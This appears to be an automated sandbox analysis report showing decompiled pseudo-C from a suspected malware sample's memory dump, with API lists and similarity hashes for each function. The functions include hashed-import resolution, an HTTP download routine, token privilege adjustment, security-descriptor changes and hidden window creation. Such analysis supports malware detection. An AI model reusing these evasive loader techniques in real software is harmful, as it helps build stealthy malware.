                                                                				_t31 = __eflags;
                                                                				_t20 = (E000E5000(_t9, __eflags, 0xffffffff) & 0x000000ff) << 0x00000008 | 0x00000001;
                                                                				E000DBF50(_t31, 9, 0xda29a27);
                                                                				_t12 = RegOpenKeyExW(_a4, _a8, 0, _t20,  &_a4); // executed
                                                                				if(_t12 == 0) {
                                                                					E000DBF50(__eflags, 9, 0x8097c7);
                                                                					_t14 = RegQueryValueExW(_a4, _a12, 0, 0, 0, 0); // executed
                                                                					__eflags = _t14;
                                                                					_t7 = _t14 == 0;
                                                                					__eflags = _t7;
                                                                					_t21 = _t20 & 0xffffff00 | _t7;
                                                                					_t15 = E000DBF50(_t7, 9, 0x3111c69);
                                                                					 *_t15(_a4);
                                                                				} else {
                                                                					_t21 = 0;
                                                                				}
                                                                				return _t21;
                                                                			}









                                                                0x000de030
                                                                0x000de04c
                                                                0x000de056
                                                                0x000de067
                                                                0x000de06b
                                                                0x000de07b
                                                                0x000de08f
                                                                0x000de091
                                                                0x000de093
                                                                0x000de093
                                                                0x000de093
                                                                0x000de09d
                                                                0x000de0a8
                                                                0x000de06d
                                                                0x000de06d
                                                                0x000de06d
                                                                0x000de0b0

                                                                APIs
                                                                • RegOpenKeyExW.KERNEL32(00000000,80000001,00000000,00000000,?,?,?,?), ref: 000DE067
                                                                • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 000DE08F
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: OpenQueryValue
                                                                • String ID:
                                                                • API String ID: 4153817207-0
                                                                • Opcode ID: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
                                                                • Instruction ID: eee15abb49b4b56123e5f64448198bf340da444ca4bd0e14e95305c95fd833a6
                                                                • Opcode Fuzzy Hash: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
                                                                • Instruction Fuzzy Hash: FD01FE766803147EEB106AA5DC43FDA3648DB40B65F150135FE1C692C3E6D1F61585F1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E000D3F90(void* _a4, intOrPtr _a8) {
                                                                				intOrPtr _t4;
                                                                				long _t8;
                                                                				void* _t10;
                                                                				void* _t14;
                                                                				void* _t15;
                                                                				long _t17;
                                                                
                                                                				_t4 = _a8;
                                                                				_t25 = _t4;
                                                                				if(_t4 == 0) {
                                                                					return 0;
                                                                				}
                                                                				_t8 = E000D22E0(_t25, E000D1460(_t25, _t4, 0x8f5419a3) + 4, 0x8f5419a3);
                                                                				_t26 = _a4;
                                                                				_t17 = _t8;
                                                                				if(_a4 == 0) {
                                                                					E000DBF50(__eflags, 0, 0x8685de3);
                                                                					_t10 = RtlAllocateHeap( *0xf2124, 8, _t17); // executed
                                                                					return _t10;
                                                                				}
                                                                				E000DBF50(_t26, 0, E000D9D50(0x6caeab8f));
                                                                				_t15 =  *0xf2124; // 0x420000
                                                                				_t14 = RtlReAllocateHeap(_t15, E000D9D50(0x647400a4), _a4, _t17); // executed
                                                                				return _t14;
                                                                			}









                                                                0x000d3f96
                                                                0x000d3f99
                                                                0x000d3f9b
                                                                0x00000000
                                                                0x000d3ffb
                                                                0x000d3fb4
                                                                0x000d3fbc
                                                                0x000d3fc0
                                                                0x000d3fc2
                                                                0x000d4006
                                                                0x000d4017
                                                                0x00000000
                                                                0x000d4017
                                                                0x000d3fd4
                                                                0x000d3fdc
                                                                0x000d3ff7
                                                                0x00000000

                                                                APIs
                                                                • RtlReAllocateHeap.NTDLL(00420000,00000000,00000000,00000000), ref: 000D3FF7
                                                                • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 000D4017
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 1be7f6cf4bfdfee0b02c0963e02dc73fe288a56de6608e9d2f5f5bd22872d58f
                                                                • Instruction ID: e46c0343fa532bb8effe88ac16149e570118faeff021bc0601b183ee0ee4778e
                                                                • Opcode Fuzzy Hash: 1be7f6cf4bfdfee0b02c0963e02dc73fe288a56de6608e9d2f5f5bd22872d58f
                                                                • Instruction Fuzzy Hash: F40186A6904304BBE6512760FC03FAA369CAB6539DF050032F90DA1343E9719A2496B2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E000E9C40(void* __eflags, void** _a4) {
                                                                				int _t6;
                                                                				int _t8;
                                                                				void** _t10;
                                                                				void* _t11;
                                                                				void* _t12;
                                                                
                                                                				_t10 = _a4;
                                                                				_t6 = E000D4A90( *_t10, 0);
                                                                				_t12 = _t11 + 8;
                                                                				_t15 = _t6 & 0x00000001;
                                                                				if((_t6 & 0x00000001) == 0) {
                                                                					E000DBF50(_t15, 0, 0xb1fd105);
                                                                					_t12 = _t12 + 8;
                                                                					_t6 = VirtualFree( *_t10, 0, 0x8000); // executed
                                                                				}
                                                                				_t16 = _t10[2];
                                                                				if(_t10[2] != 0) {
                                                                					E000DBF50(_t16, 0, 0xb8e7db5);
                                                                					_t8 = CloseHandle(_t10[2]); // executed
                                                                					return _t8;
                                                                				}
                                                                				return _t6;
                                                                			}








                                                                0x000e9c44
                                                                0x000e9c4b
                                                                0x000e9c50
                                                                0x000e9c53
                                                                0x000e9c55
                                                                0x000e9c5e
                                                                0x000e9c63
                                                                0x000e9c6f
                                                                0x000e9c6f
                                                                0x000e9c71
                                                                0x000e9c75
                                                                0x000e9c7e
                                                                0x000e9c89
                                                                0x00000000
                                                                0x000e9c89
                                                                0x000e9c8d

                                                                APIs
                                                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000E9C6F
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000E9C89
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: CloseFreeHandleVirtual
                                                                • String ID:
                                                                • API String ID: 2443081362-0
                                                                • Opcode ID: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
                                                                • Instruction ID: a0c1fb64f88f562c8023799055e48c389f3dc1ca3074c82e89f5ec0a8b5765c8
                                                                • Opcode Fuzzy Hash: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
                                                                • Instruction Fuzzy Hash: 34E0D839684314BBEA3037B1EC07F9472D49F10746F114435FA8D752EAE6A279108AB5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 75%
                                                                			E000DBF50(void* __eflags, signed int _a4, signed int _a8) {
                                                                				signed int* _v20;
                                                                				char _v52;
                                                                				char _v159;
                                                                				signed int _t32;
                                                                				intOrPtr _t35;
                                                                				struct HINSTANCE__* _t38;
                                                                				intOrPtr* _t39;
                                                                				intOrPtr* _t41;
                                                                				signed int _t51;
                                                                				signed int* _t52;
                                                                				signed int _t57;
                                                                				signed int _t58;
                                                                				signed int _t60;
                                                                				void* _t61;
                                                                				void* _t62;
                                                                
                                                                				_t60 = _a8;
                                                                				_t32 = E000D9D50(0x647402c4);
                                                                				_t62 = _t61 + 4;
                                                                				_t57 = _t60 % _t32;
                                                                				_t35 =  *((intOrPtr*)(0xf2cb8 + _t57 * 4));
                                                                				_t58 = _t57;
                                                                				if(_t35 == 0) {
                                                                					L4:
                                                                					_t51 = _a4;
                                                                					_v20 = 0xf2cb8 + _t58 * 4;
                                                                					if(_t51 > 0x23) {
                                                                						L39:
                                                                						_t37 =  *(0xf2134 + _t51 * 4);
                                                                						if( *(0xf2134 + _t51 * 4) != 0) {
                                                                							L49:
                                                                							_t38 = E000DD830(_t37, _t60);
                                                                							_t52 = _v20;
                                                                							__eflags = _t38;
                                                                							if(__eflags != 0) {
                                                                								L52:
                                                                								 *_t52 = _t60;
                                                                								 *(0xf4198 + _t58 * 4) = _t38;
                                                                								return _t38;
                                                                							}
                                                                							_t39 = E000DBF50(__eflags, 0, 0xba94474);
                                                                							 *_t39(0);
                                                                							L51:
                                                                							_t38 = 0;
                                                                							goto L52;
                                                                						}
                                                                						if(_t51 == 0x17) {
                                                                							_t37 =  *0xf37cc; // 0x0
                                                                							__eflags = _t37;
                                                                							if(__eflags != 0) {
                                                                								L48:
                                                                								 *(0xf2134 + _t51 * 4) = _t37;
                                                                								goto L49;
                                                                							}
                                                                							L46:
                                                                							_t41 = E000DBF50(_t77, 0, 0xba94474);
                                                                							 *_t41(0);
                                                                							 *(0xf2134 + _t51 * 4) = 0;
                                                                							_t52 = _v20;
                                                                							goto L51;
                                                                						}
                                                                						if(_t51 == 0x16) {
                                                                							_t37 =  *0xf4b38; // 0x0
                                                                							__eflags = _t37;
                                                                							if(__eflags == 0) {
                                                                								goto L46;
                                                                							}
                                                                							goto L48;
                                                                						}
                                                                						if(_t51 != 0x15) {
                                                                							_t37 = LoadLibraryA( &_v52); // executed
                                                                							__eflags = _t37;
                                                                							if(__eflags != 0) {
                                                                								goto L48;
                                                                							}
                                                                							goto L46;
                                                                						}
                                                                						_t37 =  *0xf37d0; // 0x0
                                                                						_t77 = _t37;
                                                                						if(_t37 != 0) {
                                                                							goto L48;
                                                                						}
                                                                						goto L46;
                                                                					}
                                                                					switch( *((intOrPtr*)(_t51 * 4 +  &M000F00B0))) {
                                                                						case 0:
                                                                							L38:
                                                                							E000DC560( &_v52, E000DD0A0(0xf0550, 0xf0550,  &_v159), 0xffffffff);
                                                                							_t62 = _t62 + 0x14;
                                                                							goto L39;
                                                                						case 1:
                                                                							goto L38;
                                                                						case 2:
                                                                							__eax = 0xf0bfc;
                                                                							goto L38;
                                                                						case 3:
                                                                							__eax = 0xf0894;
                                                                							goto L38;
                                                                						case 4:
                                                                							__eax = 0xf1044;
                                                                							goto L38;
                                                                						case 5:
                                                                							__eax = 0xf05e2;
                                                                							goto L38;
                                                                						case 6:
                                                                							__eax = 0xf07e9;
                                                                							goto L38;
                                                                						case 7:
                                                                							__eax = 0xf043c;
                                                                							goto L38;
                                                                						case 8:
                                                                							__eax = 0xf0538;
                                                                							goto L38;
                                                                						case 9:
                                                                							__eax = 0xf0781;
                                                                							goto L38;
                                                                						case 0xa:
                                                                							__eax = 0xf09fc;
                                                                							goto L38;
                                                                						case 0xb:
                                                                							__eax = 0xf097c;
                                                                							goto L38;
                                                                						case 0xc:
                                                                							__eax = 0xf101b;
                                                                							goto L38;
                                                                						case 0xd:
                                                                							__eax = 0xf07a6;
                                                                							goto L38;
                                                                						case 0xe:
                                                                							__eax = 0xf068d;
                                                                							goto L38;
                                                                						case 0xf:
                                                                							__eax = 0xf0b87;
                                                                							goto L38;
                                                                						case 0x10:
                                                                							__eax = 0xf0c24;
                                                                							goto L38;
                                                                						case 0x11:
                                                                							__eax = 0xf0b75;
                                                                							goto L38;
                                                                						case 0x12:
                                                                							__eax = 0xf09bc;
                                                                							goto L38;
                                                                						case 0x13:
                                                                							__eax = 0xf04b8;
                                                                							goto L38;
                                                                						case 0x14:
                                                                							__eax = 0xf052c;
                                                                							goto L38;
                                                                						case 0x15:
                                                                							goto L39;
                                                                						case 0x16:
                                                                							__eax = 0xf0814;
                                                                							goto L38;
                                                                						case 0x17:
                                                                							__eax = 0xf0900;
                                                                							goto L38;
                                                                						case 0x18:
                                                                							__eax = 0xf0480;
                                                                							goto L38;
                                                                						case 0x19:
                                                                							__eax = 0xf076e;
                                                                							goto L38;
                                                                						case 0x1a:
                                                                							__eax = 0xf0699;
                                                                							goto L38;
                                                                						case 0x1b:
                                                                							__eax = 0xf04db;
                                                                							goto L38;
                                                                						case 0x1c:
                                                                							__eax = 0xf0c31;
                                                                							goto L38;
                                                                						case 0x1d:
                                                                							__eax = 0xf0b60;
                                                                							goto L38;
                                                                						case 0x1e:
                                                                							__eax = 0xf09c4;
                                                                							goto L38;
                                                                						case 0x1f:
                                                                							__eax = 0xf0a2c;
                                                                							goto L38;
                                                                						case 0x20:
                                                                							__eax = 0xf09a6;
                                                                							goto L38;
                                                                					}
                                                                				}
                                                                				0;
                                                                				0;
                                                                				while(1) {
                                                                					_t69 = _t35 - _t60;
                                                                					if(_t35 == _t60) {
                                                                						break;
                                                                					}
                                                                					E000D1460(_t69, _t58, 1);
                                                                					_t62 = _t62 + 8;
                                                                					_t58 =  >  ? 0 : _t58 + 1;
                                                                					_t35 =  *((intOrPtr*)(0xf2cb8 + _t58 * 4));
                                                                					if(_t35 != 0) {
                                                                						continue;
                                                                					}
                                                                					goto L4;
                                                                				}
                                                                				return  *(0xf4198 + _t58 * 4);
                                                                			}


















                                                                0x000dbf5c
                                                                0x000dbf64
                                                                0x000dbf69
                                                                0x000dbf74
                                                                0x000dbf76
                                                                0x000dbf7d
                                                                0x000dbf81
                                                                0x000dbfb6
                                                                0x000dbfb6
                                                                0x000dbfc0
                                                                0x000dbfc6
                                                                0x000dc0fe
                                                                0x000dc0fe
                                                                0x000dc107
                                                                0x000dc163
                                                                0x000dc165
                                                                0x000dc16d
                                                                0x000dc170
                                                                0x000dc172
                                                                0x000dc189
                                                                0x000dc189
                                                                0x000dc18b
                                                                0x00000000
                                                                0x000dc18b
                                                                0x000dc17b
                                                                0x000dc185
                                                                0x000dc187
                                                                0x000dc187
                                                                0x00000000
                                                                0x000dc187
                                                                0x000dc10c
                                                                0x000dc127
                                                                0x000dc12c
                                                                0x000dc12e
                                                                0x000dc15c
                                                                0x000dc15c
                                                                0x00000000
                                                                0x000dc15c
                                                                0x000dc130
                                                                0x000dc137
                                                                0x000dc141
                                                                0x000dc143
                                                                0x000dc14e
                                                                0x00000000
                                                                0x000dc14e
                                                                0x000dc111
                                                                0x000dc153
                                                                0x000dc158
                                                                0x000dc15a
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc15a
                                                                0x000dc116
                                                                0x000dc1a1
                                                                0x000dc1a7
                                                                0x000dc1a9
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc1ab
                                                                0x000dc11c
                                                                0x000dc121
                                                                0x000dc123
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc125
                                                                0x000dbfd1
                                                                0x00000000
                                                                0x000dc0df
                                                                0x000dc0f6
                                                                0x000dc0fb
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x000dbfee
                                                                0x00000000
                                                                0x00000000
                                                                0x000dbff8
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc002
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc00c
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc016
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc020
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc02a
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc034
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc03e
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc048
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc052
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc05c
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc063
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc06a
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc071
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc078
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc07f
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc086
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc08d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc094
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc09b
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc0a2
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc0a9
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc0b0
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc0da
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc0b7
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc0be
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc0c5
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc0cc
                                                                0x00000000
                                                                0x00000000
                                                                0x000dc0d3
                                                                0x00000000
                                                                0x00000000
                                                                0x000dbfd1
                                                                0x000dbf89
                                                                0x000dbf8d
                                                                0x000dbf90
                                                                0x000dbf90
                                                                0x000dbf92
                                                                0x00000000
                                                                0x00000000
                                                                0x000dbf97
                                                                0x000dbf9c
                                                                0x000dbfa8
                                                                0x000dbfab
                                                                0x000dbfb4
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x000dbfb4
                                                                0x00000000

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: e891d7d8dd0bcd5b3f96b298169c5666e23c4385346a18af07174b7f3be4c7eb
                                                                • Instruction ID: b1425111ede4a8ef6384ab395aa4d373ace213ba3fd920bceb540cbec06bbc9e
                                                                • Opcode Fuzzy Hash: e891d7d8dd0bcd5b3f96b298169c5666e23c4385346a18af07174b7f3be4c7eb
                                                                • Instruction Fuzzy Hash: 7D514D6464831FD7F720AA98DC40E7E6A969759708F148123B606CBF43F66ADC80F672
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E000DD270(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v24;
                                                                				char _v28;
                                                                				char _v30;
                                                                				signed short _v32;
                                                                				intOrPtr _v40;
                                                                				char _v44;
                                                                				void* _t22;
                                                                				void* _t23;
                                                                				intOrPtr _t26;
                                                                				void* _t31;
                                                                				void* _t32;
                                                                				void* _t33;
                                                                				void* _t37;
                                                                				void* _t43;
                                                                				void* _t53;
                                                                				void* _t56;
                                                                				void* _t57;
                                                                				void* _t58;
                                                                				void* _t61;
                                                                				void* _t62;
                                                                
                                                                				_t22 = E000EFCF0(__ecx);
                                                                				_t54 =  &_v44;
                                                                				_t23 = E000E0190(__eflags, _t22,  &_v44);
                                                                				_t57 = _t56 + 8;
                                                                				_t64 = _t23;
                                                                				if(_t23 == 0) {
                                                                					_t43 = 0;
                                                                				} else {
                                                                					_t26 = E000EB790(_t64,  *0xf2838, _v44, _v32 & 0x0000ffff, _a8); // executed
                                                                					_t58 = _t57 + 0x10;
                                                                					if(_t26 == 0) {
                                                                						_t43 = 0;
                                                                					} else {
                                                                						_v20 = 1 + (0 | _v30 == 0x00000002) * 4;
                                                                						_t31 = E000EF190(__edx);
                                                                						_t32 = E000EEE10(__edx);
                                                                						_v20 = _t26;
                                                                						_t33 = E000EBAD0(_v30 - 2, _t26, _v40, 0, _t32, _t31, _v20); // executed
                                                                						_t61 = _t58 - 4 + 0x1c;
                                                                						if(_t33 == 0) {
                                                                							_t43 = 0;
                                                                							_t54 =  &_v44;
                                                                						} else {
                                                                							_t53 = _t33;
                                                                							_t37 = E000D1AF0(_t53,  &_v28, 0,  *0xf2c80); // executed
                                                                							_t62 = _t61 + 0x10;
                                                                							_t68 = _t37;
                                                                							_t54 =  &_v44;
                                                                							if(_t37 == 0) {
                                                                								_t43 = 0;
                                                                								__eflags = 0;
                                                                							} else {
                                                                								E000EF410(_v28, _a4, _v28, _v24 + _v28);
                                                                								E000DB570(_v28);
                                                                								_t62 = _t62 + 4;
                                                                								_t43 = 1;
                                                                							}
                                                                							E000DBF50(_t68, 0x13, 0x714b685);
                                                                							_t61 = _t62 + 8;
                                                                							InternetCloseHandle(_t53); // executed
                                                                						}
                                                                						E000EBA40(_t68, _v20);
                                                                						_t58 = _t61 + 4;
                                                                					}
                                                                					E000EB690(_t54);
                                                                				}
                                                                				return _t43;
                                                                			}
























                                                                0x000dd27b
                                                                0x000dd280
                                                                0x000dd285
                                                                0x000dd28a
                                                                0x000dd28d
                                                                0x000dd28f
                                                                0x000dd337
                                                                0x000dd295
                                                                0x000dd2a6
                                                                0x000dd2ab
                                                                0x000dd2b0
                                                                0x000dd33b
                                                                0x000dd2b6
                                                                0x000dd2ca
                                                                0x000dd2cd
                                                                0x000dd2d6
                                                                0x000dd2e8
                                                                0x000dd2ec
                                                                0x000dd2f1
                                                                0x000dd2f6
                                                                0x000dd33f
                                                                0x000dd341
                                                                0x000dd2f8
                                                                0x000dd2f8
                                                                0x000dd307
                                                                0x000dd30c
                                                                0x000dd30f
                                                                0x000dd311
                                                                0x000dd314
                                                                0x000dd346
                                                                0x000dd346
                                                                0x000dd316
                                                                0x000dd323
                                                                0x000dd32b
                                                                0x000dd330
                                                                0x000dd333
                                                                0x000dd333
                                                                0x000dd34f
                                                                0x000dd354
                                                                0x000dd358
                                                                0x000dd358
                                                                0x000dd35e
                                                                0x000dd363
                                                                0x000dd363
                                                                0x000dd367
                                                                0x000dd36c
                                                                0x000dd378

                                                                APIs
                                                                  • Part of subcall function 000EB790: InternetOpenA.WININET(000F0580,?,00000000,00000000,00000000,?,000DCD77,?,?,?,00000001,00000000,?,000DCD77,?,00000001), ref: 000EB7C2
                                                                  • Part of subcall function 000EB790: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000EB862
                                                                  • Part of subcall function 000EBAD0: HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000EBBA3
                                                                  • Part of subcall function 000D1AF0: InternetReadFile.WININET(?,?,00040000,00040000), ref: 000D1B86
                                                                • InternetCloseHandle.WININET(00000000), ref: 000DD358
                                                                  • Part of subcall function 000DB570: HeapFree.KERNEL32(00000000,000E54D2,000E54D2,?), ref: 000DB593
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: Internet$Open$CloseConnectFileFreeHandleHeapHttpReadRequest
                                                                • String ID:
                                                                • API String ID: 3651809878-0
                                                                • Opcode ID: 65c4456f4ee983d0694d5aeb63b057a757b2082158d44f809fb7e986872e8634
                                                                • Instruction ID: 878198f41d5c4de0f484b1b2af23c7ff00e21a0595978dc1d9ea219b2752da7d
                                                                • Opcode Fuzzy Hash: 65c4456f4ee983d0694d5aeb63b057a757b2082158d44f809fb7e986872e8634
                                                                • Instruction Fuzzy Hash: EB21E3B2E002096FDF00ABE59C42AFF77B99F80354F080036FA04B7243E6359A1592B2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 64%
                                                                			E000E0F60(void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                				char _v20;
                                                                				char _v24;
                                                                				char _v28;
                                                                				char _v32;
                                                                				char _v88;
                                                                				char _v288;
                                                                				void* _t18;
                                                                				intOrPtr* _t20;
                                                                				void* _t23;
                                                                				void* _t24;
                                                                				intOrPtr* _t26;
                                                                				void* _t27;
                                                                				intOrPtr* _t28;
                                                                				intOrPtr* _t30;
                                                                				void* _t31;
                                                                				void* _t45;
                                                                				void* _t51;
                                                                				void* _t52;
                                                                				void* _t55;
                                                                
                                                                				_t55 = __eflags;
                                                                				_v20 = 0;
                                                                				E000E9C90(_t55, E000D7200(0xf1060,  &_v88), 1); // executed
                                                                				_t18 = E000D9D50(0x647400a5);
                                                                				_t20 = E000DBF50(_t55, _t18, E000D9D50(0x6ec8785b));
                                                                				_t36 =  !=  ? 0xf08d0 : 0xf10b0;
                                                                				_t23 = E000D7200( !=  ? 0xf08d0 : 0xf10b0,  &_v288);
                                                                				_t51 = _t45 + 0x28;
                                                                				_t24 =  *_t20(_t23, 1,  &_v20, 0);
                                                                				_t57 = _t24;
                                                                				if(_t24 != 0) {
                                                                					_v24 = 0;
                                                                					_t26 = E000DBF50(_t57, 9, 0x8a8238c);
                                                                					_t52 = _t51 + 8;
                                                                					_t27 =  *_t26(_v20,  &_v32,  &_v24,  &_v28);
                                                                					_t58 = _t27;
                                                                					if(_t27 != 0) {
                                                                						_t30 = E000DBF50(_t58, 9, 0x90ec817);
                                                                						_t31 = E000D9D50(0x647400bc);
                                                                						_t52 = _t52 + 0xc;
                                                                						 *_t30(_a4, _a8, _t31, 0, 0, 0, _v24); // executed
                                                                					}
                                                                					_t28 = E000DBF50(_t58, 0, 0x982abe5);
                                                                					 *_t28(_v20);
                                                                				}
                                                                				return 1;
                                                                			}






















                                                                0x000e0f60
                                                                0x000e0f72
                                                                0x000e0f8a
                                                                0x000e0f97
                                                                0x000e0fb0
                                                                0x000e0fc6
                                                                0x000e0fd1
                                                                0x000e0fd6
                                                                0x000e0fe2
                                                                0x000e0fe4
                                                                0x000e0fe6
                                                                0x000e0fe8
                                                                0x000e0ff6
                                                                0x000e0ffb
                                                                0x000e100d
                                                                0x000e100f
                                                                0x000e1011
                                                                0x000e101d
                                                                0x000e102f
                                                                0x000e1034
                                                                0x000e1043
                                                                0x000e1043
                                                                0x000e104c
                                                                0x000e1057
                                                                0x000e1057
                                                                0x000e1065

                                                                APIs
                                                                  • Part of subcall function 000E9C90: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000E9D70
                                                                  • Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1
                                                                • SetNamedSecurityInfoW.ADVAPI32(00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 000E1043
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: AdjustInfoLibraryLoadNamedPrivilegesSecurityToken
                                                                • String ID:
                                                                • API String ID: 2785814242-0
                                                                • Opcode ID: 6fe259c01ef67b7cc189717ec2dce269b636c8989209d454dcefa2ca4b939fd7
                                                                • Instruction ID: 68e6f47e4325ee5f68fc7d3a369088079ae6207472bae5faae913c2bd54c773a
                                                                • Opcode Fuzzy Hash: 6fe259c01ef67b7cc189717ec2dce269b636c8989209d454dcefa2ca4b939fd7
                                                                • Instruction Fuzzy Hash: F221C7B1D4025D7BEB20A7A0EC03FFF3668DB11744F050425FA18B6383F5A16A1486F2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 68%
                                                                			E000E2F00(void* __eflags) {
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v40;
                                                                				intOrPtr _v52;
                                                                				char _v56;
                                                                				char _v84;
                                                                				char _v118;
                                                                				char _v160;
                                                                				intOrPtr* _t9;
                                                                				intOrPtr* _t13;
                                                                				intOrPtr* _t16;
                                                                				struct HINSTANCE__* _t17;
                                                                				WCHAR* _t19;
                                                                				struct HWND__* _t22;
                                                                				char* _t25;
                                                                
                                                                				_t36 = __eflags;
                                                                				_t25 =  &_v56;
                                                                				E000E8F20(_t25, 0x28);
                                                                				_v52 = E000E1070;
                                                                				_t9 = E000DBF50(__eflags, 0, 0xa39ecc7);
                                                                				_v40 =  *_t9(0);
                                                                				_v20 = E000D7200(0xf0c10,  &_v118);
                                                                				_t13 = E000DBF50(_t36, 1, 0x38227e7);
                                                                				 *_t13(_t25);
                                                                				E000DBF50(_t36, 1, 0xf3c7b77);
                                                                				_t16 = E000DBF50(_t36, 0, 0xa39ecc7);
                                                                				_t17 =  *_t16(0);
                                                                				_t19 = E000D7200(0xf0790,  &_v84);
                                                                				_t22 = CreateWindowExW(0, E000D7200(0xf0c10,  &_v160), _t19, 0xcf0000, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, _t17, 0); // executed
                                                                				return _t22;
                                                                			}

















                                                                0x000e2f00
                                                                0x000e2f0c
                                                                0x000e2f12
                                                                0x000e2f1a
                                                                0x000e2f28
                                                                0x000e2f34
                                                                0x000e2f48
                                                                0x000e2f52
                                                                0x000e2f5b
                                                                0x000e2f64
                                                                0x000e2f75
                                                                0x000e2f7f
                                                                0x000e2f8c
                                                                0x000e2fce
                                                                0x000e2fda

                                                                APIs
                                                                  • Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1
                                                                • CreateWindowExW.USER32(00000000,00000000,00000000,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000E2FCE
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: CreateLibraryLoadWindow
                                                                • String ID:
                                                                • API String ID: 4174337752-0
                                                                • Opcode ID: 176a125fb5729b2053fa5b20d57012cc61f4a16095ae188c0ab2b86fb45e9d12
                                                                • Instruction ID: fd95230cfb0f725b8e39e5a86ac2c88b2b8a6ed407f542fb8bb29a5c305af805
                                                                • Opcode Fuzzy Hash: 176a125fb5729b2053fa5b20d57012cc61f4a16095ae188c0ab2b86fb45e9d12
                                                                • Instruction Fuzzy Hash: AB111276E843187AF76066B0AC03FFE3658DB51B05F650126FF0C79287F5912A1446F6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 84%
